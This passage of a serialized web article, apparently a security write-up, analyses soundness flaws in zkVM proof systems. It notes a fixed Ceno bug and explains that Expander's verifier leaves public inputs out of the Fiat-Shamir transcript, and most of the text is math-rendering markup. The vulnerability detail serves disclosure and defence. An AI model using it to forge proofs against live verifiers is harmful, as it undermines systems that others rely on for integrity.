9],[127621],{"type":27,"tag":207,"props":127622,"children":127624},{"className":127623},[11314,28914],[127625,127654],{"type":27,"tag":207,"props":127626,"children":127628},{"className":127627},[11319],[127629,127649],{"type":27,"tag":207,"props":127630,"children":127632},{"className":127631,"style":100316},[11324],[127633],{"type":27,"tag":207,"props":127634,"children":127635},{"style":100320},[127636,127640],{"type":27,"tag":207,"props":127637,"children":127639},{"className":127638,"style":11334},[11333],[],{"type":27,"tag":207,"props":127641,"children":127643},{"className":127642},[11339,11340,11341,11342],[127644],{"type":27,"tag":207,"props":127645,"children":127647},{"className":127646},[11294,11342],[127648],{"type":33,"value":1651},{"type":27,"tag":207,"props":127650,"children":127652},{"className":127651},[29017],[127653],{"type":33,"value":29020},{"type":27,"tag":207,"props":127655,"children":127657},{"className":127656},[11319],[127658],{"type":27,"tag":207,"props":127659,"children":127661},{"className":127660,"style":100347},[11324],[127662],{"type":27,"tag":207,"props":127663,"children":127664},{},[],{"type":27,"tag":207,"props":127666,"children":127668},{"className":127667},[29011],[127669],{"type":33,"value":10416},{"type":33,"value":1041},{"type":27,"tag":36,"props":127672,"children":127673},{},[127674,127676,127829],{"type":33,"value":127675},"We have two unknowns ",{"type":27,"tag":84,"props":127677,"children":127679},{"className":127678},[11266,11267],[127680],{"type":27,"tag":207,"props":127681,"children":127683},{"className":127682},[11272],[127684],{"type":27,"tag":207,"props":127685,"children":127687},{"className":127686,"ariaHidden":11278},[11277],[127688],{"type":27,"tag":207,"props":127689,"children":127691},{"className":127690},[11283],[127692,127696,127701,127758,127763,127767,127824],{"type":27,"tag":207,"props":127693,"children":127695},{"className":127694,"style":11393},[11288],[],{"type":27,"tag":207,"props":127697,"children":127699},{"className":127698},[28989],[127700],{"type":33,"value":1343},{"type":27,"tag":207,"props":127702,"children":127704},{"className":127703},[11294],[127705,127710],{"type":27,"tag":207,"props":127706,"children":127708},{"className":127707},[11294,28860],[127709],{"type":33,"value":26546},{"type":27,"tag":207,"props":127711,"children":127713},{"className":127712},[11309],[127714],{"type":27,"tag":207,"props":127715,"children":127717},{"className":127716},[11314,28914],[127718,127747],{"type":27,"tag":207,"props":127719,"children":127721},{"className":127720},[11319],[127722,127742],{"type":27,"tag":207,"props":127723,"children":127725},{"className":127724,"style":100316},[11324],[127726],{"type":27,"tag":207,"props":127727,"children":127728},{"style":100320},[127729,127733],{"type":27,"tag":207,"props":127730,"children":127732},{"className":127731,"style":11334},[11333],[],{"type":27,"tag":207,"props":127734,"children":127736},{"className":127735},[11339,11340,11341,11342],[127737],{"type":27,"tag":207,"props":127738,"children":127740},{"className":127739},[11294,11342],[127741],{"type":33,"value":1660},{"type":27,"tag":207,"props":127743,"children":127745},{"className":127744},[29017],[127746],{"type":33,"value":29020},{"type":27,"tag":207,"props":127748,"children":127750},{"className":127749},[11319],[127751],{"type":27,"tag":207,"props":127752,"children":127754},{"className":127753,"style":100347},[11324],[127755],{"type":27,"tag":207,"props":127756,"children":127757},{},[],{"type":27,"tag":207,"props":127759,"children":127761},{"className":127760},[11404],[127762],{"type":33,"value":11407},{"type":27,"tag":207,"props":127764,"children":127766},{"className":127765,"style":11411},[11372],[],{"type":27,"tag":207,"props":127768,"children":127770},{"className":127769},[11294],[127771,127776],{"type":27,"tag":207,"props":127772,"children":127774},{"className":127773},[11294,28860],[127775],{"type":33,"value":26546},{"type":27,"tag":207,"props":127777,"children":127779},{"className":127778},[11309],[127780],{"type":27,"tag":207,"props":127781,"children":127783},{"className":127782},[11314,28914],[127784,127813],{"type":27,"tag":207,"props":127785,"children":127787},{"className":127786},[11319],[127788,127808],{"type":27,"tag":207,"props":127789,"children":127791},{"className":127790,"style":100316},[11324],[127792],{"type":27,"tag":207,"props":127793,"children":127794},{"style":100320},[127795,127799],{"type":27,"tag":207,"props":127796,"children":127798},{"className":127797,"style":11334},[11333],[],{"type":27,"tag":207,"props":127800,"children":127802},{"className":127801},[11339,11340,11341,11342],[127803],{"type":27,"tag":207,"props":127804,"children":127806},{"className":127805},[11294,11342],[127807],{"type":33,"value":1651},{"type":27,"tag":207,"props":127809,"children":127811},{"className":127810},[29017],[127812],{"type":33,"value":29020},{"type":27,"tag":207,"props":127814,"children":127816},{"className":127815},[11319],[127817],{"type":27,"tag":207,"props":127818,"children":127820},{"className":127819,"style":100347},[11324],[127821],{"type":27,"tag":207,"props":127822,"children":127823},{},[],{"type":27,"tag":207,"props":127825,"children":127827},{"className":127826},[29011],[127828],{"type":33,"value":10416},{"type":33,"value":127830}," and two equations, one linear and one bilinear:",{"type":27,"tag":12719,"props":127832,"children":127833},{},[127834,128161],{"type":27,"tag":1232,"props":127835,"children":127836},{},[127837,127839],{"type":33,"value":127838},"Linear (from GKR): ",{"type":27,"tag":84,"props":127840,"children":127842},{"className":127841},[11266,11267],[127843],{"type":27,"tag":207,"props":127844,"children":127846},{"className":127845},[11272],[127847],{"type":27,"tag":207,"props":127848,"children":127850},{"className":127849,"ariaHidden":11278},[11277],[127851,127987,128122,128148],{"type":27,"tag":207,"props":127852,"children":127854},{"className":127853},[11283],[127855,127860,127917,127974,127978,127983],{"type":27,"tag":207,"props":127856,"children":127859},{"className":127857,"style":127858},[11288],"height:0.7333em;vertical-align:-0.15em;",[],{"type":27,"tag":207,"props":127861,"children":127863},{"className":127862},[11294],[127864,127869],{"type":27,"tag":207,"props":127865,"children":127867},{"className":127866},[11294,28860],[127868],{"type":33,"value":47},{"type":27,"tag":207,"props":127870,"children":127872},{"className":127871},[11309],[127873],{"type":27,"tag":207,"props":127874,"children":127876},{"className":127875},[11314,28914],[127877,127906],{"type":27,"tag":207,"props":127878,"children":127880},{"className":127879},[11319],[127881,127901],{"type":27,"tag":207,"props":127882,"children":127884},{"className":127883,"style":100316},[11324],[127885],{"type":27,"tag":207,"props":127886,"children":127887},{"style":100320},[127888,127892],{"type":27,"tag":207,"props":127889,"children":127891},{"className":127890,"style":11334},[11333],[],{"type":27,"tag":207,"props":127893,"children":127895},{"className":127894},[11339,11340,11341,11342],[127896],{"type":27,"tag":207,"props":127897,"children":127899},{"className":127898},[11294,11342],[127900],{"type":33,"value":1660},{"type":27,"tag":207,"props":127902,"children":127904},{"className":127903},[29017],[127905],{"type":33,"value":29020},{"type":27,"tag":207,"props":127907,"children":127909},{"className":127908},[11319],[127910],{"type":27,"tag":207,"props":127911,"children":127913},{"className":127912,"style":100347},[11324],[127914],{"type":27,"tag":207,"props":127915,"children":127916},{},[],{"type":27,"tag":207,"props":127918,"children":127920},{"className":127919},[11294],[127921,127926],{"type":27,"tag":207,"props":127922,"children":127924},{"className":127923},[11294,28860],[127925],{"type":33,"value":26546},{"type":27,"tag":207,"props":127927,"children":127929},{"className":127928},[11309],[127930],{"type":27,"tag":207,"props":127931,"children":127933},{"className":127932},[11314,28914],[127934,127963],{"type":27,"tag":207,"props":127935,"children":127937},{"className":127936},[11319],[127938,127958],{"type":27,"tag":207,"props":127939,"children":127941},{"className":127940,"style":100316},[11324],[127942],{"type":27,"tag":207,"props":127943,"children":127944},{"style":100320},[127945,127949],{"type":27,"tag":207,"props":127946,"children":127948},{"className":127947,"style":11334},[11333],[],{"type":27,"tag":207,"props":127950,"children":127952},{"className":127951},[11339,11340,11341,11342],[127953],{"type":27,"tag":207,"props":127954,"children":127956},{"className":127955},[11294,11342],[127957],{"type":33,"value":1660},{"type":27,"tag":207,"props":127959,"children":127961},{"className":127960},[29017],[127962],{"type":33,"value":29020},{"type":27,"tag":207,"props":127964,"children":127966},{"className":127965},[11319],[127967],{"type":27,"tag":207,"props":127968,"children":127970},{"className":127969,"style":100347},[11324],[127971],{"type":27,"tag":207,"props":127972,"children":127973},{},[],{"type":27,"tag":207,"props":127975,"children":127977},{"className":127976,"style":11373},[11372],[],{"type":27,"tag":207,"props":127979,"children":127981},{"className":127980},[11378],[127982],{"type":33,"value":2227},{"type":27,"tag":207,"props":127984,"children":127986},{"className":127985,"style":11373},[11372],[],{"type":27,"tag":207,"props":127988,"children":127990},{"className":127989},[11283],[127991,127995,128052,128109,128113,128118],{"type":27,"tag":207,"props":127992,"children":127994},{"className":127993,"style":127858},[11288],[],{"type":27,"tag":207,"props":127996,"children":127998},{"className":127997},[11294],[127999,128004],{"type":27,"tag":207,"props":128000,"children":128002},{"className":128001},[11294,28860],[128003],{"type":33,"value":47},{"type":27,"tag":207,"props":128005,"children":128007},{"className":128006},[11309],[128008],{"type":27,"tag":207,"props":128009,"children":128011},{"className":128010},[11314,28914],[128012,128041],{"type":27,"tag":207,"props":128013,"children":128015},{"className":128014},[11319],[128016,128036],{"type":27,"tag":207,"props":128017,"children":128019},{"className":128018,"style":100316},[11324],[128020],{"type":27,"tag":207,"props":128021,"children":128022},{"style":100320},[128023,128027],{"type":27,"tag":207,"props":128024,"children":128026},{"className":128025,"style":11334},[11333],[],{"type":27,"tag":207,"props":128028,"children":128030},{"className":128029},[11339,11340,11341,11342],[128031],{"type":27,"tag":207,"props":128032,"children":128034},{"className":128033},[11294,11342],[128035],{"type":33,"value":1651},{"type":27,"tag":207,"props":128037,"children":128039},{"className":128038},[29017],[128040],{"type":33,"value":29020},{"type":27,"tag":207,"props":128042,"children":128044},{"className":128043},[11319],[128045],{"type":27,"tag":207,"props":128046,"children":128048},{"className":128047,"style":100347},[11324],[128049],{"type":27,"tag":207,"props":128050,"children":128051},{},[],{"type":27,"tag":207,"props":128053,"children":128055},{"className":128054},[11294],[128056,128061],{"type":27,"tag":207,"props":128057,"children":128059},{"className":128058},[11294,28860],[128060],{"type":33,"value":26546},{"type":27,"tag":207,"props":128062,"children":128064},{"className":128063},[11309],[128065],{"type":27,"tag":207,"props":128066,"children":128068},{"className":128067},[11314,28914],[128069,128098],{"type":27,"tag":207,"props":128070,"children":128072},{"className":128071},[11319],[128073,128093],{"type":27,"tag":207,"props":128074,"children":128076},{"className":128075,"style":100316},[11324],[128077],{"type":27,"tag":207,"props":128078,"children":128079},{"style":100320},[128080,128084],{"type":27,"tag":207,"props":128081,"children":128083},{"className":128082,"style":11334},[11333],[],{"type":27,"tag":207,"props":128085,"children":128087},{"className":128086},[11339,11340,11341,11342],[128088],{"type":27,"tag":207,"props":128089,"children":128091},{"className":128090},[11294,11342],[128092],{"type":33,"value":1651},{"type":27,"tag":207,"props":128094,"children":128096},{"className":128095},[29017],[128097],{"type":33,"value":29020},{"type":27,"tag":207,"props":128099,"children":128101},{"className":128100},[11319],[128102],{"type":27,"tag":207,"props":128103,"children":128105},{"className":128104,"style":100347},[11324],[128106],{"type":27,"tag":207,"props":128107,"children":128108},{},[],{"type":27,"tag":207,"props":128110,"children":128112},{"className":128111,"style":11373},[11372],[],{"type":27,"tag":207,"props":128114,"children":128116},{"className":128115},[11378],[128117],{"type":33,"value":2227},{"type":27,"tag":207,"props":128119,"children":128121},{"className":128120,"style":11373},[11372],[],{"type":27,"tag":207,"props":128123,"children":128125},{"className":128124},[11283],[128126,128130,128135,128139,128144],{"type":27,"tag":207,"props":128127,"children":128129},{"className":128128,"style":118092},[11288],[],{"type":27,"tag":207,"props":128131,"children":128133},{"className":128132},[11294,28860],[128134],{"type":33,"value":10435},{"type":27,"tag":207,"props":128136,"children":128138},{"className":128137,"style":11470},[11372],[],{"type":27,"tag":207,"props":128140,"children":128142},{"className":128141},[11475],[128143],{"type":33,"value":10380},{"type":27,"tag":207,"props":128145,"children":128147},{"className":128146,"style":11470},[11372],[],{"type":27,"tag":207,"props":128149,"children":128151},{"className":128150},[11283],[128152,128156],{"type":27,"tag":207,"props":128153,"children":128155},{"className":128154,"style":101295},[11288],[],{"type":27,"tag":207,"props":128157,"children":128159},{"className":128158},[11294],[128160],{"type":33,"value":1660},{"type":27,"tag":1232,"props":128162,"children":128163},{},[128164,128166],{"type":33,"value":128165},"Bilinear (from multiset): ",{"type":27,"tag":84,"props":128167,"children":128169},{"className":128168},[11266,11267],[128170],{"type":27,"tag":207,"props":128171,"children":128173},{"className":128172},[11272],[128174],{"type":27,"tag":207,"props":128175,"children":128177},{"className":128176,"ariaHidden":11278},[11277],[128178,128204,128282,128360,128386],{"type":27,"tag":207,"props":128179,"children":128181},{"className":128180},[11283],[128182,128186,128191,128195,128200],{"type":27,"tag":207,"props":128183,"children":128185},{"className":128184,"style":100179},[11288],[],{"type":27,"tag":207,"props":128187,"children":128189},{"className":128188,"style":101693},[11294,28860],[128190],{"type":33,"value":95904},{"type":27,"tag":207,"props":128192,"children":128194},{"className":128193,"style":11373},[11372],[],{"type":27,"tag":207,"props":128196,"children":128198},{"className":128197},[11378],[128199],{"type":33,"value":118513},{"type":27,"tag":207,"props":128201,"children":128203},{"className":128202,"style":11373},[11372],[],{"type":27,"tag":207,"props":128205,"children":128207},{"className":128206},[11283],[128208,128212,128269,128273,128278],{"type":27,"tag":207,"props":128209,"children":128211},{"className":128210,"style":127304},[11288],[],{"type":27,"tag":207,"props":128213,"children":128215},{"className":128214},[11294],[128216,128221],{"type":27,"tag":207,"props":128217,"children":128219},{"className":128218},[11294,28860],[128220],{"type":33,"value":26546},{"type":27,"tag":207,"props":128222,"children":128224},{"className":128223},[11309],[128225],{"type":27,"tag":207,"props":128226,"children":128228},{"className":128227},[11314,28914],[128229,128258],{"type":27,"tag":207,"props":128230,"children":128232},{"className":128231},[11319],[128233,128253],{"type":27,"tag":207,"props":128234,"children":128236},{"className":128235,"style":100316},[11324],[128237],{"type":27,"tag":207,"props":128238,"children":128239},{"style":100320},[128240,128244],{"type":27,"tag":207,"props":128241,"children":128243},{"className":128242,"style":11334},[11333],[],{"type":27,"tag":207,"props":128245,"children":128247},{"className":128246},[11339,11340,11341,11342],[128248],{"type":27,"tag":207,"props":128249,"children":128251},{"className":128250},[11294,11342],[128252],{"type":33,"value":1660},{"type":27,"tag":207,"props":128254,"children":128256},{"className":128255},[29017],[128257],{"type":33,"value":29020},{"type":27,"tag":207,"props":128259,"children":128261},{"className":128260},[11319],[128262],{"type":27,"tag":207,"props":128263,"children":128265},{"className":128264,"style":100347},[11324],[128266],{"type":27,"tag":207,"props":128267,"children":128268},{},[],{"type":27,"tag":207,"props":128270,"children":128272},{"className":128271,"style":11373},[11372],[],{"type":27,"tag":207,"props":128274,"children":128276},{"className":128275},[11378],[128277],{"type":33,"value":118513},{"type":27,"tag":207,"props":128279,"children":128281},{"className":128280,"style":11373},[11372],[],{"type":27,"tag":207,"props":128283,"children":128285},{"className":128284},[11283],[128286,128290,128347,128351,128356],{"type":27,"tag":207,"props":128287,"children":128289},{"className":128288,"style":127858},[11288],[],{"type":27,"tag":207,"props":128291,"children":128293},{"className":128292},[11294],[128294,128299],{"type":27,"tag":207,"props":128295,"children":128297},{"className":128296},[11294,28860],[128298],{"type":33,"value":26546},{"type":27,"tag":207,"props":128300,"children":128302},{"className":128301},[11309],[128303],{"type":27,"tag":207,"props":128304,"children":128306},{"className":128305},[11314,28914],[128307,128336],{"type":27,"tag":207,"props":128308,"children":128310},{"className":128309},[11319],[128311,128331],{"type":27,"tag":207,"props":128312,"children":128314},{"className":128313,"style":100316},[11324],[128315],{"type":27,"tag":207,"props":128316,"children":128317},{"style":100320},[128318,128322],{"type":27,"tag":207,"props":128319,"children":128321},{"className":128320,"style":11334},[11333],[],{"type":27,"tag":207,"props":128323,"children":128325},{"className":128324},[11339,11340,11341,11342],[128326],{"type":27,"tag":207,"props":128327,"children":128329},{"className":128328},[11294,11342],[128330],{"type":33,"value":1651},{"type":27,"tag":207,"props":128332,"children":128334},{"className":128333},[29017],[128335],{"type":33,"value":29020},{"type":27,"tag":207,"props":128337,"children":128339},{"className":128338},[11319],[128340],{"type":27,"tag":207,"props":128341,"children":128343},{"className":128342,"style":100347},[11324],[128344],{"type":27,"tag":207,"props":128345,"children":128346},{},[],{"type":27,"tag":207,"props":128348,"children":128350},{"className":128349,"style":11373},[11372],[],{"type":27,"tag":207,"props":128352,"children":128354},{"className":128353},[11378],[128355],{"type":33,"value":2227},{"type":27,"tag":207,"props":128357,"children":128359},{"className":128358,"style":11373},[11372],[],{"type":27,"tag":207,"props":128361,"children":128363},{"className":128362},[11283],[128364,128368,128373,128377,128382],{"type":27,"tag":207,"props":128365,"children":128367},{"className":128366,"style":100179},[11288],[],{"type":27,"tag":207,"props":128369,"children":128371},{"className":128370},[11294,28860],[128372],{"type":33,"value":77797},{"type":27,"tag":207,"props":128374,"children":128376},{"className":128375,"style":11470},[11372],[],{"type":27,"tag":207,"props":128378,"children":128380},{"className":128379},[11475],[128381],{"type":33,"value":10380},{"type":27,"tag":207,"props":128383,"children":128385},{"className":128384,"style":11470},[11372],[],{"type":27,"tag":207,"props":128387,"children":128389},{"className":128388},[11283],[128390,128394],{"type":27,"tag":207,"props":128391,"children":128393},{"className":128392,"style":101295},[11288],[],{"type":27,"tag":207,"props":128395,"children":128397},{"className":128396},[11294],[128398],{"type":33,"value":1660},{"type":27,"tag":36,"props":128400,"children":128401},{},[128402],{"type":33,"value":128403},"Substitution reduces this to a quadratic in one variable, which is solvable with the quadratic formula.",{"type":27,"tag":36,"props":128405,"children":128406},{},[128407,128411,128413,128420,128422,128429],{"type":27,"tag":12606,"props":128408,"children":128409},{},[128410],{"type":33,"value":123960},{"type":33,"value":128412}," Fixed on March 5, 2026 via ",{"type":27,"tag":47,"props":128414,"children":128417},{"href":128415,"rel":128416},"https://github.com/scroll-tech/ceno/pull/1262",[51],[128418],{"type":33,"value":128419},"PR #1262",{"type":33,"value":128421}," (original report: ",{"type":27,"tag":47,"props":128423,"children":128426},{"href":128424,"rel":128425},"https://github.com/scroll-tech/ceno/issues/1125",[51],[128427],{"type":33,"value":128428},"#1125",{"type":33,"value":10416},{"type":27,"tag":26063,"props":128431,"children":128432},{},[],{"type":27,"tag":58,"props":128434,"children":128436},{"id":128435},"expander-polyhedra",[128437],{"type":33,"value":128438},"Expander (Polyhedra)",{"type":27,"tag":36,"props":128440,"children":128441},{},[128442],{"type":33,"value":128443},"Expander is a GKR-based proof system for arithmetic circuits.",{"type":27,"tag":36,"props":128445,"children":128446},{},[128447],{"type":27,"tag":12606,"props":128448,"children":128449},{},[128450],{"type":33,"value":122666},{"type":27,"tag":101,"props":128452,"children":128454},{"code":128453},"Proof (raw bytes, parsed in order):\n - PCS commitment\n - Sumcheck round polynomials (for each layer)\n - Layer claims (claim_x, claim_y)\n - PCS opening proofs\n\nNOT in proof bytes (passed separately):\n - public_input // statement data passed separately\n - claimed_v // statement claim passed separately\n",[128455],{"type":27,"tag":84,"props":128456,"children":128457},{"__ignoreMap":7},[128458],{"type":33,"value":128453},{"type":27,"tag":36,"props":128460,"children":128461},{},[128462,128464,128470],{"type":33,"value":128463},"In Expander's circuit model, constant gates can reference public input values. During GKR verification, the ",{"type":27,"tag":84,"props":128465,"children":128467},{"className":128466},[],[128468],{"type":33,"value":128469},"eval_cst",{"type":33,"value":128471}," evaluates the contribution of these gates at the sumcheck challenge point:",{"type":27,"tag":101,"props":128473,"children":128475},{"code":128474,"language":10269,"meta":7,"className":10270,"style":7},"sum -= GKRVerifierHelper::eval_cst(&layer.const_, public_input, sp);\n",[128476],{"type":27,"tag":84,"props":128477,"children":128478},{"__ignoreMap":7},[128479],{"type":27,"tag":207,"props":128480,"children":128481},{"class":209,"line":210},[128482,128486,128491,128496,128500,128504,128508,128512,128517,128521,128526,128531,128535,128540],{"type":27,"tag":207,"props":128483,"children":128484},{"style":220},[128485],{"type":33,"value":83863},{"type":27,"tag":207,"props":128487,"children":128488},{"style":226},[128489],{"type":33,"value":128490}," -=",{"type":27,"tag":207,"props":128492,"children":128493},{"style":8920},[128494],{"type":33,"value":128495}," GKRVerifierHelper",{"type":27,"tag":207,"props":128497,"children":128498},{"style":226},[128499],{"type":33,"value":10768},{"type":27,"tag":207,"props":128501,"children":128502},{"style":1335},[128503],{"type":33,"value":128469},{"type":27,"tag":207,"props":128505,"children":128506},{"style":238},[128507],{"type":33,"value":1343},{"type":27,"tag":207,"props":128509,"children":128510},{"style":226},[128511],{"type":33,"value":10398},{"type":27,"tag":207,"props":128513,"children":128514},{"style":220},[128515],{"type":33,"value":128516},"layer",{"type":27,"tag":207,"props":128518,"children":128519},{"style":226},[128520],{"type":33,"value":1041},{"type":27,"tag":207,"props":128522,"children":128523},{"style":238},[128524],{"type":33,"value":128525},"const_, ",{"type":27,"tag":207,"props":128527,"children":128528},{"style":220},[128529],{"type":33,"value":128530},"public_input",{"type":27,"tag":207,"props":128532,"children":128533},{"style":238},[128534],{"type":33,"value":1123},{"type":27,"tag":207,"props":128536,"children":128537},{"style":220},[128538],{"type":33,"value":128539},"sp",{"type":27,"tag":207,"props":128541,"children":128542},{"style":238},[128543],{"type":33,"value":1455},{"type":27,"tag":36,"props":128545,"children":128546},{},[128547,128549,128554],{"type":33,"value":128548},"This evaluation is a linear combination of public input values, weighted by coefficients derived from the challenges stored in the verifier's scratch pad (",{"type":27,"tag":84,"props":128550,"children":128552},{"className":128551},[],[128553],{"type":33,"value":128539},{"type":33,"value":28014},{"type":27,"tag":36,"props":128556,"children":128557},{},[128558],{"type":27,"tag":12606,"props":128559,"children":128560},{},[128561],{"type":33,"value":128562},"The vulnerability:",{"type":27,"tag":36,"props":128564,"children":128565},{},[128566,128571],{"type":27,"tag":84,"props":128567,"children":128569},{"className":128568},[],[128570],{"type":33,"value":128530},{"type":33,"value":128572}," is never absorbed into the transcript. The transcript is initialized from the PCS commitment and sumcheck round messages, but public inputs are passed separately to the verifier.",{"type":27,"tag":36,"props":128574,"children":128575},{},[128576],{"type":27,"tag":126,"props":128577,"children":128580},{"alt":128578,"src":128579},"9_expander","/posts/zkvms-unfaithful-claims/9_expander.svg",[],{"type":27,"tag":36,"props":128582,"children":128583},{},[128584,128585,128590],{"type":33,"value":23888},{"type":27,"tag":84,"props":128586,"children":128588},{"className":128587},[],[128589],{"type":33,"value":128469},{"type":33,"value":128591}," function computes a linear combination:",{"type":27,"tag":36,"props":128593,"children":128594},{},[128595],{"type":27,"tag":84,"props":128596,"children":128598},{"className":128597},[11266,11267],[128599],{"type":27,"tag":207,"props":128600,"children":128602},{"className":128601},[11272],[128603],{"type":27,"tag":207,"props":128604,"children":128606},{"className":128605,"ariaHidden":11278},[11277],[128607,128652,128776],{"type":27,"tag":207,"props":128608,"children":128610},{"className":128609},[11283],[128611,128615,128624,128629,128639,128643,128648],{"type":27,"tag":207,"props":128612,"children":128614},{"className":128613,"style":101677},[11288],[],{"type":27,"tag":207,"props":128616,"children":128618},{"className":128617},[11294,33],[128619],{"type":27,"tag":207,"props":128620,"children":128622},{"className":128621},[11294],[128623],{"type":33,"value":8871},{"type":27,"tag":207,"props":128625,"children":128627},{"className":128626,"style":100264},[11294],[128628],{"type":33,"value":10371},{"type":27,"tag":207,"props":128630,"children":128632},{"className":128631},[11294,33],[128633],{"type":27,"tag":207,"props":128634,"children":128636},{"className":128635},[11294],[128637],{"type":33,"value":128638},"cst",{"type":27,"tag":207,"props":128640,"children":128642},{"className":128641,"style":11470},[11372],[],{"type":27,"tag":207,"props":128644,"children":128646},{"className":128645},[11475],[128647],{"type":33,"value":10380},{"type":27,"tag":207,"props":128649,"children":128651},{"className":128650,"style":11470},[11372],[],{"type":27,"tag":207,"props":128653,"children":128655},{"className":128654},[11283],[128656,128660,128717,128721,128748,128753,128758,128763,128767,128772],{"type":27,"tag":207,"props":128657,"children":128659},{"className":128658,"style":100206},[11288],[],{"type":27,"tag":207,"props":128661,"children":128663},{"className":128662},[28896],[128664,128669],{"type":27,"tag":207,"props":128665,"children":128667},{"className":128666,"style":28903},[28896,28901,28902],[128668],{"type":33,"value":116046},{"type":27,"tag":207,"props":128670,"children":128672},{"className":128671},[11309],[128673],{"type":27,"tag":207,"props":128674,"children":128676},{"className":128675},[11314,28914],[128677,128706],{"type":27,"tag":207,"props":128678,"children":128680},{"className":128679},[11319],[128681,128701],{"type":27,"tag":207,"props":128682,"children":128684},{"className":128683,"style":121458},[11324],[128685],{"type":27,"tag":207,"props":128686,"children":128687},{"style":28927},[128688,128692],{"type":27,"tag":207,"props":128689,"children":128691},{"className":128690,"style":11334},[11333],[],{"type":27,"tag":207,"props":128693,"children":128695},{"className":128694},[11339,11340,11341,11342],[128696],{"type":27,"tag":207,"props":128697,"children":128699},{"className":128698},[11294,28860,11342],[128700],{"type":33,"value":4690},{"type":27,"tag":207,"props":128702,"children":128704},{"className":128703},[29017],[128705],{"type":33,"value":29020},{"type":27,"tag":207,"props":128707,"children":128709},{"className":128708},[11319],[128710],{"type":27,"tag":207,"props":128711,"children":128713},{"className":128712,"style":121738},[11324],[128714],{"type":27,"tag":207,"props":128715,"children":128716},{},[],{"type":27,"tag":207,"props":128718,"children":128720},{"className":128719,"style":11411},[11372],[],{"type":27,"tag":207,"props":128722,"children":128724},{"className":128723},[11294],[128725,128734,128739],{"type":27,"tag":207,"props":128726,"children":128728},{"className":128727},[11294,33],[128729],{"type":27,"tag":207,"props":128730,"children":128732},{"className":128731},[11294],[128733],{"type":33,"value":68907},{"type":27,"tag":207,"props":128735,"children":128737},{"className":128736,"style":100264},[11294],[128738],{"type":33,"value":10371},{"type":27,"tag":207,"props":128740,"children":128742},{"className":128741},[11294,33],[128743],{"type":27,"tag":207,"props":128744,"children":128746},{"className":128745},[11294],[128747],{"type":33,"value":15648},{"type":27,"tag":207,"props":128749,"children":128751},{"className":128750},[28989],[128752],{"type":33,"value":11019},{"type":27,"tag":207,"props":128754,"children":128756},{"className":128755},[11294,28860],[128757],{"type":33,"value":4690},{"type":27,"tag":207,"props":128759,"children":128761},{"className":128760},[29011],[128762],{"type":33,"value":22686},{"type":27,"tag":207,"props":128764,"children":128766},{"className":128765,"style":11373},[11372],[],{"type":27,"tag":207,"props":128768,"children":128770},{"className":128769},[11378],[128771],{"type":33,"value":118513},{"type":27,"tag":207,"props":128773,"children":128775},{"className":128774,"style":11373},[11372],[],{"type":27,"tag":207,"props":128777,"children":128779},{"className":128778},[11283],[128780,128784,128793,128798,128803,128808,128812,128861],{"type":27,"tag":207,"props":128781,"children":128783},{"className":128782,"style":11393},[11288],[],{"type":27,"tag":207,"props":128785,"children":128787},{"className":128786},[11294,33],[128788],{"type":27,"tag":207,"props":128789,"children":128791},{"className":128790},[11294],[128792],{"type":33,"value":119840},{"type":27,"tag":207,"props":128794,"children":128796},{"className":128795},[28989],[128797],{"type":33,"value":1343},{"type":27,"tag":207,"props":128799,"children":128801},{"className":128800},[11294,28860],[128802],{"type":33,"value":4690},{"type":27,"tag":207,"props":128804,"children":128806},{"className":128805},[11404],[128807],{"type":33,"value":11407},{"type":27,"tag":207,"props":128809,"children":128811},{"className":128810,"style":11411},[11372],[],{"type":27,"tag":207,"props":128813,"children":128815},{"className":128814},[11294,119400],[128816],{"type":27,"tag":207,"props":128817,"children":128819},{"className":128818},[11314],[128820],{"type":27,"tag":207,"props":128821,"children":128823},{"className":128822},[11319],[128824],{"type":27,"tag":207,"props":128825,"children":128827},{"className":128826,"style":119486},[11324],[128828,128840],{"type":27,"tag":207,"props":128829,"children":128830},{"style":119417},[128831,128835],{"type":27,"tag":207,"props":128832,"children":128834},{"className":128833,"style":119422},[11333],[],{"type":27,"tag":207,"props":128836,"children":128838},{"className":128837,"style":100264},[11294,28860],[128839],{"type":33,"value":101083},{"type":27,"tag":207,"props":128841,"children":128842},{"style":119417},[128843,128847],{"type":27,"tag":207,"props":128844,"children":128846},{"className":128845,"style":119422},[11333],[],{"type":27,"tag":207,"props":128848,"children":128850},{"className":128849,"style":119510},[119440],[128851],{"type":27,"tag":207,"props":128852,"children":128854},{"className":128853,"style":119516},[119515],[128855],{"type":27,"tag":41529,"props":128856,"children":128857},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[128858],{"type":27,"tag":119528,"props":128859,"children":128860},{"d":119530},[],{"type":27,"tag":207,"props":128862,"children":128864},{"className":128863},[29011],[128865],{"type":33,"value":10416},{"type":27,"tag":36,"props":128867,"children":128868},{},[128869,128870,128939,128941,128946,128948,128953],{"type":33,"value":123086},{"type":27,"tag":84,"props":128871,"children":128873},{"className":128872},[11266,11267],[128874],{"type":27,"tag":207,"props":128875,"children":128877},{"className":128876},[11272],[128878],{"type":27,"tag":207,"props":128879,"children":128881},{"className":128880,"ariaHidden":11278},[11277],[128882],{"type":27,"tag":207,"props":128883,"children":128885},{"className":128884},[11283],[128886,128890],{"type":27,"tag":207,"props":128887,"children":128889},{"className":128888,"style":119486},[11288],[],{"type":27,"tag":207,"props":128891,"children":128893},{"className":128892},[11294,119400],[128894],{"type":27,"tag":207,"props":128895,"children":128897},{"className":128896},[11314],[128898],{"type":27,"tag":207,"props":128899,"children":128901},{"className":128900},[11319],[128902],{"type":27,"tag":207,"props":128903,"children":128905},{"className":128904,"style":119486},[11324],[128906,128918],{"type":27,"tag":207,"props":128907,"children":128908},{"style":119417},[128909,128913],{"type":27,"tag":207,"props":128910,"children":128912},{"className":128911,"style":119422},[11333],[],{"type":27,"tag":207,"props":128914,"children":128916},{"className":128915,"style":100264},[11294,28860],[128917],{"type":33,"value":101083},{"type":27,"tag":207,"props":128919,"children":128920},{"style":119417},[128921,128925],{"type":27,"tag":207,"props":128922,"children":128924},{"className":128923,"style":119422},[11333],[],{"type":27,"tag":207,"props":128926,"children":128928},{"className":128927,"style":119510},[119440],[128929],{"type":27,"tag":207,"props":128930,"children":128932},{"className":128931,"style":119516},[119515],[128933],{"type":27,"tag":41529,"props":128934,"children":128935},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[128936],{"type":27,"tag":119528,"props":128937,"children":128938},{"d":119530},[],{"type":33,"value":128940}," contains the challenges. Since challenges are derived before the statement data is bound, they are independent of 